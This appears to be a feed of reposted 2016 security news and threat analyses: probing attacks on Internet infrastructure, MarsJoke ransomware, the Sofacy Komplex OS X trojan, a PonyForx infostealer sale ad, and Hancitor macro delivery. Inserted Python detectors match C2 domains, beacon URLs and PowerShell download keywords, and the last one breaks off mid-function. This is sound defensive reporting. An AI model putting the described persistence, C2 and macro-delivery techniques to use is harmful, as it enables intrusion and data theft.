
A nation-state actor is testing methods for a massive takedown of the Internet


According to prominent cyber security experts, an unknown nation-state actor may be running tests for taking down the entire Internet infrastructure. What happens if someone shuts down the Internet? Is it possible?

Our society heavily depends on technology and the Internet is the privileged vector of the information today. Blocking the Internet could paralyze countless services in almost any industry, from finance to transportation.

In early September the well-known cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet” that reveals an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.

We are referring to coordinated attacks that experts consider a kind of test to evaluate the resilience of the most critical nodes of the global Internet. The attacks experienced by the companies require significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker such as a government, and China is the first suspect.

“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.

“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.”

It is clear that attackers aim to cause a global blackout of the most common top-level domains paralyzing a large portion of the Internet.

Schneier, who has spoken with companies that faced the attacks, pointed out powerful DDoS attacks that stand out from the ordinary for their methodically escalating nature.

The attacks start at a certain intensity that increases as time goes by, forcing the victims to deploy all their countermeasures to mitigate the threat.

The report mentioned by Schneier, titled “VERISIGN-OBSERVED DDoS ATTACK TRENDS: Q2 2016”, confirms that companies are experiencing a wave of increasingly sophisticated DDoS attacks.


“DDoS Attacks Become More Sophisticated and Persistent DDoS attacks are a reality for today’s web-reliant organizations. In Q2 2016, DDoS attacks continued to become more frequent, persistent and complex.” states the report.

Schneier also reported other types of attacks against the Internet infrastructure, such as numerous attempts to tamper with Internet addresses and routing.

“One company told me about a variety of probing attacks in addition to the DDoS attacks: testing the ability to manipulate Internet addresses and routes, seeing how long it takes the defenders to respond, and so on. Someone is extensively testing the core defensive capabilities of the companies that provide critical Internet services.” continues Schneier.

Who is behind the attacks?

Schneier believes that the attacks are launched by someone with the cyber capabilities of a government, and he seems to exclude hacktivists or cyber criminals; I agree.

“It doesn’t seem like something an activist, criminal, or researcher would do. Profiling core infrastructure is common practice in espionage and intelligence gathering. It’s not normal for companies to do that. Furthermore, the size and scale of these probes — and especially their persistence — points to state actors.” explains Schneier.

The attribution of the attacks is very difficult, but the data suggests that China is behind them. Let me add that Russia has similar cyber abilities and is able to hide its operations online. Both countries are investing heavily in building infrastructures that would be resilient to this kind of mass attack.

Source:http://securityaffairs.co

KNOWLEDGE BELONGS TO THE WORLD

The post A nation-state actor is testing methods for a massive takedown of the Internet appeared first on Information Security Newspaper.


MarsJoke Ransomware Mimics CTB-Locker


Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers. We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.

Proofpoint researchers originally spotted the MarsJoke ransomware in late August [1] by trawling through our repository of unknown malware. However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke. This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.

The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August [2]. Gary Warner’s blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, is responsible for distributing this spam [4][5][6].

Email Campaign

On September 22, Proofpoint detected a large MarsJoke ransomware email campaign. Emails contained URLs linking to an executable file named “file_6.exe” hosted on various sites with recently registered domains, apparently for the purpose of supporting this campaign. This is a departure from the much more frequent attached document campaigns we have observed recently with a range of malware, including the widely distributed Locky ransomware. The messages in this campaign used a convincing email body and had a variety of Subject lines referencing a major national air carrier, adding an air of legitimacy to the lures with stolen branding. Subjects included:

  • Checking tracking number
  • Check your package
  • Check your TN
  • Check your tracking number
  • Tracking information
  • Track your package


Figure 1: Email using a convincing lure and fraudulent branding to deliver the malicious ransomware URLs

This campaign is primarily aimed at state and local government agencies, followed by K-12 educational institutions. Messages came through in smaller numbers for healthcare, telecommunications, insurance, and several other verticals.


Figure 2: Vertical targeting by indexed message volume

Analysis

We chose the name for this ransomware based on a string contained within the code: “HelloWorldItsJokeFromMars”. Visually, it mimics the style of CTB-Locker[3], including the helper application displayed to the user and the onion portal.

To alert victims that they are infected and their files are encrypted, this ransomware creates “!!! For Decrypt !!!.bat”, “!!! Readme For Decrypt !!!.txt”, and “ReadMeFilesDecrypt!!!.txt” files sprinkled throughout the victim’s file system, similar to many other types of ransomware.


Figure 3: Ransomware readme files

Encrypted files keep their original extension. Temporary files with “.a19” and “.ap19” file extensions are used during the encryption process but are deleted when the process is finished.


Figure 4: Temporary files used during encryption

The readme file instructs infected users to follow the instructions in the locker window, or alternatively to visit an onion portal after installing a Tor browser, where they receive the same instructions.


Figure 5: MarsJoke text file ransom note contents

The victim’s Desktop background is changed and a dialog pops up presenting the ransom message. This dialog is available in several languages, including English (the default during testing), Russian, Italian, Spanish, and Ukrainian. Victims have 96 hours to submit the ransom of 0.7 BTC (currently 319.98 USD) before files are deleted.


Figure 5: Victim’s Desktop background is changed

The network communication protocol consists of checking in with the command and control (C&C) server to report a new infection, followed by a more verbose check-in reporting various fields such as signature, malware version, etc., transmitting URL-encoded, base64-encoded data.


Figure 6: Malware initial C&C checkin


Figure 7: Malware follow up C&C check-in

Finally, the ransomware provides the user with an onion-hosted web panel with which to interact and get instructions on how to pay the ransom.


Figure 8: Onion-hosted web panel that also provides instructions on how to pay the ransom.

Conclusion

Ransomware has become a billion dollar a year industry for cybercriminals. In the case of the MarsJoke campaign described here, K-12 educational institutions and state and local governments are often seen as easy targets because they lack the infrastructure and funding to ensure robust backups and strong defensive resources are in place to prevent and mitigate infections. MarsJoke does not appear to be “just another ransomware,” though. The message volume and targeting associated with this campaign bear further monitoring as attackers look to monetize new variants and old strains saturate potential victims.

Source:https://www.proofpoint.com/


The post MarsJoke Ransomware Mimics CTB-Locker appeared first on Information Security Newspaper.

Sofacy’s ‘Komplex’ OS X Trojan


The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload. Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.

Komplex Binder

Komplex is a Trojan that the Sofacy group created to compromise individuals using OS X devices. The Trojan has multiple parts, first leading with a binder component that is responsible for saving a second payload and a decoy document to the system. We found three different versions of the Komplex binder, one that was created to run on x86, another on x64, and a third that contained binders for both x86 and x64 architectures. We found the following samples of the Komplex binder:

Regardless of architecture, these initial binders all save a second embedded Mach-O file to ‘/tmp/content’. This file is the Komplex dropper used in the next stage of installation and to maintain persistence. After saving the Komplex dropper, these binders then save a legitimate decoy document to the system and open it using the ‘Preview’ application to minimize suspicion of any malicious activity. Figure 1 shows the main function found in one of the initial droppers that saves and opens a PDF decoy, as well as executing another executable file saved as ‘/tmp/content’.

Figure 1 Main function within the Komplex binder

The binder component saves a decoy document named roskosmos_2015-2025.pdf to the system and opens it using the Preview application built into OS X. Figure 2 shows a portion of the 17 page decoy document. This document is titled “Проект Федеральной космической программы России на 2016 – 2025 годы” (“Draft Federal Space Program of Russia for 2016 – 2025”) and describes the Russian Federal Space Program’s projects between 2016 and 2025. We do not have detailed targeting information regarding the Sofacy group’s attack campaign delivering Komplex at this time; however, based on the contents of the decoy document, we believe that the target is likely associated with the aerospace industry.


Figure 2 Decoy document opened by Komplex binder showing document regarding the Russian Space Program

Komplex Dropper

The Komplex dropper component is saved to the system as “/tmp/content” (SHA256: 96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) and is responsible for installing a third executable to the system and setting up persistence for the third executable to launch each time the OS X operating system starts. This dropper also provided the basis for the name “Komplex”, which is seen in several folder paths that were included within the Mach-O file, such as “/Users/kazak/Desktop/Project/komplex”.

The Komplex dropper is fairly straightforward from a functional perspective, as it contains all of its functionality within its “_main” function. The “_main” function (Figure 3) accesses data within three variables named ‘_Payload_1’, ‘_Payload_2’ and ‘_Payload_3’, and writes them to three files on the system.

Figure 3 Komplex Dropper’s main function that drops three files to the system and runs a shell script

The “_main” function writes the data within ‘_Payload_1’, ‘_Payload_2’, and ‘_Payload_3’ variables to the following files, respectively:

  1. /Users/Shared/.local/kextd (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5)
  2. /Users/Shared/com.apple.updates.plist (SHA256: 1f22e8f489abff004a3c47210a9642798e1c53efc9d6f333a1072af4b11d71ef)
  3. /Users/Shared/start.sh (SHA256: d494e9f885ad2d6a2686424843142ddc680bb5485414023976b4d15e3b6be800)

The shell script saved to ‘/Users/Shared/start.sh’ calls the system command ‘launchctl’ to add a plist entry into ‘launchd’ to automatically execute the Komplex payload each time the system starts. Figure 4 shows the contents of the ‘start.sh’ script that sets up persistence for the payload.

Figure 4 Contents of the start.sh shell script that calls launchctl

The ‘start.sh’ script loads ‘com.apple.updates.plist’, which sets the properties of the Komplex payload that is executed from “/Users/Shared/.local/kextd” at system start up courtesy of the “RunAtLoad” parameter. Figure 5 shows the contents of the ‘com.apple.updates.plist’ file loaded into ‘launchd’.

Figure 5 Contents of the com.apple.updates.plist file showing how the dropper achieves persistence
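The persistence described above leaves a launchd job with three traits a defender can audit for: an Apple-looking label (com.apple.updates) whose program is not under an Apple-owned path, a program inside a hidden directory under the world-writable /Users/Shared, and RunAtLoad set. The following is an added example, not Unit 42’s code; the plist contents are constructed from the description in the text (the exact file in Figure 5 is not reproduced on the page), and the list of Apple-owned path prefixes is an assumed heuristic.

```python
import plistlib
from pathlib import PurePosixPath
from typing import Dict, List, Optional

# Assumption: genuine com.apple.* launch jobs execute from these locations.
APPLE_OWNED_PREFIXES = ("/System/", "/usr/", "/Applications/")


def program_path(job: Dict) -> Optional[str]:
    """launchd takes the executable from Program or ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments")
    return args[0] if args else None


def audit_launchd_job(job: Dict) -> List[str]:
    """Return human-readable findings for one parsed launchd job (empty if clean)."""
    findings = []
    path = program_path(job)
    if path is None:
        return ["job declares no Program or ProgramArguments"]
    label = str(job.get("Label", ""))
    # Any path component beginning with "." (e.g. /Users/Shared/.local) is hidden from Finder.
    if any(part.startswith(".") for part in PurePosixPath(path).parts):
        findings.append(f"program is under a hidden directory: {path}")
    if path.startswith("/Users/Shared/"):
        findings.append("program lives in /Users/Shared, a world-writable location no Apple job uses")
    if label.startswith("com.apple.") and not path.startswith(APPLE_OWNED_PREFIXES):
        findings.append(f"label {label!r} claims the com.apple namespace but runs {path}")
    if findings and job.get("RunAtLoad"):
        findings.append("RunAtLoad is true, so the program starts whenever the job is loaded (every boot/login)")
    return findings


def audit_plist_bytes(data: bytes) -> List[str]:
    """Parse a plist (XML or binary) and audit it."""
    return audit_launchd_job(plistlib.loads(data))


# Constructed plist mirroring the Komplex dropper's persistence as described in the text.
KOMPLEX_STYLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.apple.updates</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/Shared/.local/kextd</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>
"""

# Constructed benign job for comparison: RunAtLoad alone is not suspicious.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>org.example.backup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/local/bin/backup</string>
    <string>--nightly</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for name, data in (("komplex-style", KOMPLEX_STYLE_PLIST), ("benign", BENIGN_PLIST)):
        print(name, "->", audit_plist_bytes(data) or ["no findings"])
```

On a live system the same function can be run over every file in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons.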

Komplex Payload

The ultimate purpose of the aforementioned components is to install and execute the Komplex payload. The dropper component saves the payload to “/Users/Shared/.local/kextd” (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5) and ultimately executes the payload. The payload begins by conducting an anti-debugging check to see if it is being debugged before proceeding with executing its main functionality, which can be seen in the “AmIBeingDebugged” function in Figure 6. The “AmIBeingDebugged” function uses the “sysctl” function to check to see if a specific “P_TRACED” flag is set, which signifies that the process is being debugged. A particularly interesting part of this function is that it is very similar to the function provided by Apple to its developers in a guide created in 2004 titled “Detecting the Debugger”. This is not the first time the Sofacy group’s malware authors have obtained techniques from publicly available sources, as demonstrated in the use of the Office Test Persistence Method that they obtained from a blog posted in 2014.

Figure 6 The AmIBeingDebugged function used as an anti-analysis technique

After determining that it is not running in a debugger, the payload performs an anti-analysis/sandbox check by issuing a GET request to Google to check for Internet connectivity. The payload sleeps until it receives a response to its HTTP request to Google, which means Komplex will only communicate with its C2 servers in Internet-enabled environments. Figure 7 shows the “connectedToInternet” function that confirms whether the payload is able to communicate with “http://www.google.com” before carrying out its functionality.

Figure 7 The connectedToInternet function testing for an active Internet connection

After confirming an active Internet connection, the Komplex payload begins carrying out its main functionality. The Komplex payload uses an 11-byte XOR algorithm to decrypt strings used for configuration and within C2 communications, including the C2 domains themselves. Figure 8 shows a screenshot of Komplex’s custom string decryption algorithm, along with the XOR key used to decrypt strings within the payload.


Figure 8 11-byte XOR algorithm used by Komplex to decrypt configuration strings

The algorithm seen in Figure 8 decrypts the strings seen in Table 1, which the payload references using the associated variable names. The payload uses these decrypted strings for a variety of purposes, such as command parsing and C2 server locations.


Variable Name       Decrypted String
FILE_NAME           FileName
PATHTOSAVE          PathToSave
START_BLOCK_FILE    [file]
BLOCK_EXECUTE       Execute
BLOCK_DELETE        Delete
END_BLOCK_FILE      [/file]
SERVERS             appleupdate[.]org, apple-iclouds[.]net, itunes-helper[.]net
MAC                 mac
CONFIG              config
GET_CONFIG          1
FILES               file
LOG                 log
OLD_CONFIG          2
ID                  id
TOKEN               h8sn3vq6kl
EXTENSIONS          .xml .pdf, .htm, .zip

Table 1 Strings decrypted by Komplex and their referenced name

The Komplex payload uses the SERVERS variable to obtain the location of its C2, which it communicates with using HTTP POST requests. The payload generates a URL to communicate with its C2 server that has the following structure:

/<random path>/<random string>.<chosen extension>/?<random string>=<encrypted token>

The <chosen extension> portion of the URL is chosen at random from the list of legitimate file extensions: .xml, .zip, .htm and .pdf. The <encrypted token> within the parameters of the URL is base64 encoded ciphertext created from the string ‘h8sn3vq6kl’. The ciphertext of the string is generated via a custom algorithm that uses a random 4-byte integer as a key that is modified by XOR with the static value 0xE150722. The payload also encrypts the data sent within the POST request using the same algorithm and encodes it using base64. Figure 9 below shows an example HTTP POST sent from the payload to its C2 server.
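The beacon URL structure above is distinctive enough to hunt for in proxy logs: a file name with one of the four extensions, then a slash before the query string, then a single parameter whose value is base64. The following detector is an added example, not Unit 42’s code; it matches that shape and the Table 1 C2 domains against a constructed log format (timestamp, client IP, method, host, path, status), and the token check only verifies valid base64 since the page does not give the encryption algorithm in full.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Komplex C2 domains from Table 1 (defanged on the page, written plainly here for matching).
KOMPLEX_C2_DOMAINS = {"appleupdate.org", "apple-iclouds.net", "itunes-helper.net"}

# Beacon URL shape from the text:
#   /<random path>/<random string>.<chosen extension>/?<random string>=<encrypted token>
# The tell-tale detail is "/?" right after a file extension.
BEACON_URL_RE = re.compile(
    r"""
    ^/(?P<path>[A-Za-z0-9_-]+)                  # <random path>
    /(?P<name>[A-Za-z0-9_-]+)                   # <random string>
    (?P<ext>\.(?:xml|zip|htm|pdf))              # <chosen extension>, from the list in the text
    /\?                                         # slash after the extension, then the query
    (?P<key>[A-Za-z0-9_-]+)=(?P<token>[A-Za-z0-9+/=%]+)$   # <random string>=<encrypted token>
    """,
    re.VERBOSE,
)

REASON_DOMAIN = "host is a Komplex C2 domain listed in Table 1"
REASON_SHAPE = "URL has the Komplex/Carberp beacon shape"


def is_base64_token(token: str) -> bool:
    """True if the URL-decoded token is valid, non-empty base64 (the token is base64 ciphertext)."""
    raw = unquote(token)  # the token may arrive with '=' encoded as %3D
    if len(raw) % 4 != 0 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", raw):
        return False
    try:
        return len(base64.b64decode(raw, validate=True)) > 0
    except (binascii.Error, ValueError):
        return False


def match_beacon_url(path: str) -> Optional[Dict[str, str]]:
    """Return the URL components if `path` has the beacon shape, else None."""
    m = BEACON_URL_RE.match(path)
    if m is None or not is_base64_token(m.group("token")):
        return None
    return m.groupdict()


def classify_request(method: str, host: str, path: str) -> List[str]:
    """Reasons this request looks like Komplex C2 traffic (empty list if none)."""
    reasons = []
    if host.lower() in KOMPLEX_C2_DOMAINS:
        reasons.append(REASON_DOMAIN)
    if match_beacon_url(path) is not None:
        # The page says the beacon is a POST; keep the method so a GET can be weighed differently.
        reasons.append(f"{REASON_SHAPE} ({method.upper()})")
    return reasons


def scan_proxy_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify_request over lines in the assumed constructed format:
    <timestamp> <client ip> <method> <host> <path> <status>."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) != 6:
            continue  # blank line or not in the assumed format
        _, client, method, host, path, _ = fields
        reasons = classify_request(method, host, path)
        if reasons:
            findings.append({"line": lineno, "client": client, "host": host,
                             "path": path, "reasons": reasons})
    return findings


# Constructed sample proxy log (not real traffic); line 2 is the Google connectivity check.
SAMPLE_LOG = [
    "2016-09-26T10:14:03Z 10.0.0.5 POST appleupdate.org /Q7d2k/r9fz.pdf/?u9x=SGVsbG9Xb3JsZA== 200",
    "2016-09-26T10:14:05Z 10.0.0.5 GET www.google.com / 200",
    "2016-09-26T10:15:41Z 10.0.0.9 GET files.example.com /docs/report.pdf?dl=1 200",
    "2016-09-26T10:16:02Z 10.0.0.9 POST cdn.example.net /updates/s3cr3t.xml/?id=c2VjcmV0dG9rZW4%3D 200",
    "2016-09-26T10:17:30Z 10.0.0.5 POST apple-iclouds.net /login 404",
]

if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} -> {f['host']}{f['path']}: {'; '.join(f['reasons'])}")
```

The fourth sample line shows the value of the shape rule: an unknown host is still flagged because the path, not the domain, carries the signature.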


Figure 9 Beacon sent from Komplex to C2 containing system information within the HTTP POST data

The HTTP POST data in Figure 9 is comprised of information that the malware collects from the infected system. The system information sent to the C2 includes data such as the system version, username, and process list, which is gathered within a function named “getOsInfo” within the “InfoOS” class (Figure 10).

Figure 10 getOsInfo function within Komplex that gathers system information for C2 beacon

The Sofacy C2 server will respond to this HTTP request with encrypted data that the payload will decrypt using the same custom algorithm used to encrypt the POST data. The Komplex payload will parse the C2 response for the following strings: “[file]” and “[/file]”, “FileName=”, “PathToSave=”, “Shell=”, “Execute”, and “Delete”. The “Delete” action does nothing more than delete a file specified by ‘PathToSave’/’FileName’, whereas the “Execute” action involves running the following system commands before executing the specified file:

The payload will treat “[file]” and “[/file]” as delimiters that specify the data that the payload should write to a specified file, which allows the threat actor to download additional files to the system. Lastly, the payload can execute commands on the compromised system specified within the “Shell” field, which the payload will execute and then send results back to the C2.

Connections to Sofacy and Previous Attacks

Code Overlaps

While reverse engineering the Komplex payload, we came across a few code overlaps that we believed were worth exploring. First, we noticed striking similarities between the Komplex payload and the traits and behavior of an OS X Trojan discussed in a BAE Systems blog titled NEW MAC OS MALWARE EXPLOITS MACKEEPER. According to this blog post, an OS X Trojan was delivered via a vulnerability in the MacKeeper application. The nameless OS X Trojan uses an 11-byte XOR algorithm to decrypt an embedded configuration, which has all of the same variable names and values as the Komplex sample (see Table 1). The algorithm used to encrypt and decrypt the network traffic, as well as all static elements of the network communications (composition of URL, structure of HTTP data, command parsing procedure, etc.) discussed in the blog post are the exact same as seen in the Komplex payload. These overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was in fact the Komplex Trojan.

The second code overlap ties the Komplex Trojan to Sofacy’s Carberp variant, which we have analyzed in previous research efforts. Even though Komplex was created to run on OS X and Sofacy’s Carberp variant was developed to run on Windows, they share many commonalities, including:

  • Same URL generation logic using random path values, a random file extension and encrypted token
  • Same file extensions used in C2 URL that are listed within the binaries in the same order
  • Same algorithm used to encrypt and decrypt the token in the URL and HTTP POST data (Carberp key is modified using value 0xAA7D756 whereas Komplex uses 0xE150722)
  • Very similar command handling, including parsing specifically for Execute, Delete, [file], [/file], FileName, and PathToSave.
  • Checks for Internet connectivity by connecting to google.com
  • Uses an 11-byte XOR key to decrypt strings within the configuration

In addition to these common traits, we found a Sofacy Carberp variant (SHA256: 638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd) using the same TOKEN value of ‘h8sn3vq6kl’ within its C2 URL, as observed in Komplex payloads. Based on these observations, we believe that the author of Sofacy’s Carberp variant used the same code, or at least the same design, to create the Komplex Trojan. A benefit of retaining many of the same functionalities within the Windows and OS X Trojans is that it would require fewer alterations to the C2 server application to handle cross-platform implants.

Infrastructure Overlap

While Komplex’s C2 domain appleupdate[.]org does not appear to have any previously known activity associated with it, both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to Sofacy activity. The apple-iclouds[.]net domain is mentioned within a PwC Tactical Intelligence Bulletin that discussed a phishing campaign conducted by the Sofacy group. The itunes-helper[.]net domain is associated with separate activity discussed in Trend Micro’s blog titled Looking Into a Cyber-Attack Facilitator in the Netherlands that included research on hosting providers used by Pawn Storm (Sofacy).

The domain appleupdate[.]org does have one interesting correlation point, specifically involving the IP 185.10.58[.]170, to which this domain resolved between April 2015 and April 2016. Researchers at BAE Systems provided Unit 42 the Komplex payload delivered through the exploitation of MacKeeper (Dropper SHA256: da43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73 and Payload SHA256: 45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54), which used the IP address 185.10.58[.]170 within its configuration as a C2 server. This infrastructure overlap further strengthens the connection between the Komplex payload we discovered and the prior campaign using MacKeeper for delivery.

Conclusion

The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks. The tool is capable of downloading additional files to the system, executing and deleting files, as well as directly interacting with the system shell. While detailed targeting information is not currently available, we believe Komplex has been used in attacks on individuals related to the aerospace industry, as well as attacks leveraging an exploit in MacKeeper to deliver the Trojan. The Komplex Trojan revealed a design similar to Sofacy’s Carberp variant Trojan, which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease.

Source:http://researchcenter.paloaltonetworks.com


The post Sofacy’s ‘Komplex’ OS X Trojan appeared first on Information Security Newspaper.

New PonyForx Infostealer Malware Sold on Russian Hacking Forums


PonyForx is a fork of the more popular Pony infostealer. A crook named Cronbot is currently selling a new malware variant on Russian underground hacking forums that appears to be a successful fork of an older and very advanced infostealer called Pony.

Named Fox but currently identified by researchers as PonyForx or Fox Stealer, this new malware is currently at v1.0 and has been put up for sale since around August 11, this year.

Its author says this is a fork of the Pony infostealer, with added support for further applications from which PonyForx can extract information and login credentials.

Pony, also known as Fareit, is an old, reputable (among crooks), and reliable information-stealing malware that can get passwords and all sorts of data from a wide range of applications, from browsers to email clients, and from FTP applications to Bitcoin wallets.

Cronbot says PonyForx is Pony updated “for 2016,” with updated support for today’s most popular apps. The crook is offering his malware for rent as an EXE or DLL file for $250 per month. Even if he’s adamant he’s not selling access to the PonyForx source code, he lists a price for it of $2,000.

PonyForx deployed in live attacks

Security researcher Kafeine, who spotted the ad, says PonyForx has been used in live attacks.

The researcher discovered a campaign in September that was using the Neutrino exploit kit to deliver the Godzilla malware loader to users. In turn, Godzilla would download the PonyForx infostealer, and after it was done, it would deliver the Locky ransomware.

Below is Cronbot’s ad, translated into English from the original Russian.

Password stealer and more - Fox v1.0
We are releasing a product for sale. The product is already in its final stage of testing.
About the product:
1. Does everything Pony can do, plus support for new software has been added.
2. Up to date for 2016.
3. Written in C++ without any additional libraries.
4. Admin panel from Pony.
Terms:
1. Rent only.
2. Distributed as EXE and DLL.
3. We will not sell the source code.
Rent: $250 per month.
Source code: $2,000 one-time fee.

Source:http://news.softpedia.com/

The post New PonyForx Infostealer Malware Sold on Russian Hacking Forums appeared first on Information Security Newspaper.

HANCITOR DOWNLOADER ABUSING APIS, POWERSHELL COMMANDS


We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers. The malicious document used to deliver the Hancitor executable was observed being distributed as an attachment in email spam. Once downloaded and executed, it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable, which perform data theft and connect to a command and control (C2) server.

Stage 1: Email Delivery

We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor.

Figure 1: Email with a malicious document attached

Stage 2: Macro and Luring Mechanism

Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches.

Figure 2: Luring the victim to enable macros

First Approach

Unlike other malicious macros, this one does not call APIs directly to run the payload. Macros can call APIs directly, but they are normally not expected to run shellcode. The macro used to deliver Hancitor calls the native Windows API “CallWindowProc”, which can be abused to interpret and execute shellcode, as depicted in Figure 3.

Figure 3: Code within the macro that uses the CallWindowProc API to execute shellcode

Second Approach

Recently, FireEye Exploit Guard captured Hancitor samples that leverage a new API Callback function. In addition to “CallWindowProc”, Hancitor samples may use the function EnumResourceTypesA to interpret and execute shellcode, as seen in Figure 4.

Figure 4: EnumResourceTypesA API declaration

Third Approach

We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft.

With this approach, the luring message shown in Figure 2 serves another purpose. Not only does it lure the victim into enabling macros, it is also assigned an alternate text, “fkwarning”, as seen in Figure 5. The macro checks this attribute to make sure the luring message shape object is present. If this object is not found, the macro exits without downloading additional payloads.

Figure 5: Code to ensure that the luring message is intact and the malicious document is executed for the first time

Even if it finds the luring message, it will run the macro once and will delete the shape so that the macro will never be executed again, as seen in Figure 6.

Figure 6: Code to delete the shape that includes the lure message

The malicious macro replaces the deleted image with another that displays the text “network error” to reduce user suspicions, as shown in Figure 7. Note that text is always present in the malicious macro, but it will only be made visible by the macro when it is executing for the first time.

Figure 7: The hidden text that becomes visible once the macro is executed for the first time

The macro then combines fragments of code to make a PowerShell command. However, unlike in the other approaches, the malicious code is not hidden in the macro code, a form, or the document metadata. We observed that the malware extracts malicious code fragments from within the section header of the embedded image and combines them into a PowerShell command on the fly, as seen in Figure 8. This technique evades some basic static detection methods applied to macros and macro forms.

Figure 8:  PowerShell command observed in header after increasing font size

The malware authors have taken a very simple but interesting approach to obscuring the PowerShell command text: the font size of the header text is set to a microscopic 1, as seen in Figure 9. This reduces the likelihood that a casual observer will notice anything unusual.

Figure 9:  Minimal font size to hide content of header

Using the “DownloadFile” method, PowerShell obtains a payload from an attacker-controlled website as a ZIP archive. PowerShell then uses the “copyhere” function to unzip the payload. The option passed via “.Item” is set to “16”, which suppresses all warning dialogs, as seen in Figure 10.

Figure 10: Code to download archived payload and unzip it

Once the downloaded executable has been extracted from the ZIP archive, the macro deletes the archive using the “Kill” function, as seen in Figure 11. When the executable runs, it downloads Pony and Vawtrak malware variants to steal data.

Figure 11:  Code to delete the archive
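The hiding technique described above (command fragments placed in a header at a microscopic font size) is easy to check for outside of Word. The following scanner is an added example, not FireEye's code or Hancitor's: it assumes the lure is an OOXML .docx, where each text run stores its font size in half-points (w:sz val="2" is a 1-point font), and it walks the body, header and footer parts looking for tiny runs and for the download/unzip tokens the analysis mentions. The sample document it builds in memory is constructed for the demonstration and is not a real lure.

```python
"""Flag text hidden by a microscopic font size in a Word (.docx) document.

Added example, not FireEye's code. The page does not say whether the
Hancitor lure was a binary .doc or an OOXML .docx; this scanner assumes
.docx, where font size is stored in half-points on each run (w:sz val="2"
is a 1-point font). The sample document is constructed inline.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
NS = {"w": W_NS}

# Half-points; flag 2-point text and smaller (the page describes size 1).
TINY_HALF_POINTS = 4

# Tokens the page associates with the macro's on-the-fly PowerShell command.
SUSPICIOUS = re.compile(r"powershell|DownloadFile|copyhere", re.IGNORECASE)


def tiny_runs(xml_bytes):
    """Yield (point_size, text) for each run whose font is at or below the threshold."""
    root = ET.fromstring(xml_bytes)
    for run in root.iter(f"{{{W_NS}}}r"):
        sz = run.find("w:rPr/w:sz", NS)
        if sz is None:
            continue
        try:
            half_points = int(sz.get(f"{{{W_NS}}}val"))
        except (TypeError, ValueError):
            continue
        if half_points <= TINY_HALF_POINTS:
            text = "".join(t.text or "" for t in run.findall("w:t", NS))
            if text.strip():
                yield half_points / 2, text


def scan_docx(data):
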